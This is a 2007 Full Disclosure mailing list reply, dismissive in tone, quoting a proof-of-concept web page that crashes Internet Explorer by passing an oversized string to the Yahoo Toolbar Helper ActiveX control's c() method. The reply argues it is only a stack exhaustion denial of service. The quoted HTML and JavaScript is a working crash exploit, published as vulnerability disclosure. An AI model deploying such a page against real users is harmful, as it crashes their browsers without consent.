Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Yahoo Toolbar Helper c() Method Stack Overflow DoS

From: "Joey Mengele" <joey.mengele () hushmail com>
Date: Fri, 30 Nov 2007 10:59:37 -0500
Yeah, strange how EIP isn't overwritten with your hacker savvy 0x41 
characters. Except for the fact that this again is a stack overflow 
exception and not a stack based buffer overflow. I implore you, 
LEAVE THE TROLLING TO THE PROFESSIONALS. Thanks.

J

On Wed, 31 Dec 1969 19:00:00 -0500 Elazar Broad 
<elazarb () earthlink net> wrote:

There is a stack overflow in the c() method of the Yahoo Toobar 
Helper class. This overflow does not appear to get anywhere near 
the EIP or SEH. PoC as follows:

----------------------
<!--
written by e.b.
-->
<html>
<head>
 <script language="JavaScript" DEFER>
   function Check() {
   var s = "AAAA";

    while (s.length < 999999) s=s+s;

    var obj = new ActiveXObject("yt.ythelper.2"); //{02478D38-
C3F9-4EFB-9B51-7695ECA05670}
     obj.c(s);
  }
 </script>

</head>
<body onload="JavaScript: return Check();">
</body>
</html>
----------------------

Elazar

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


--
Click here for to find products that will help grow your small business.
http://tagline.hushmail.com/fc/Ioyw6h4eDJdaRPJuJyztiEAJ83hvsi2qyqoJMOdLAcA5KZpqWleU5a/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: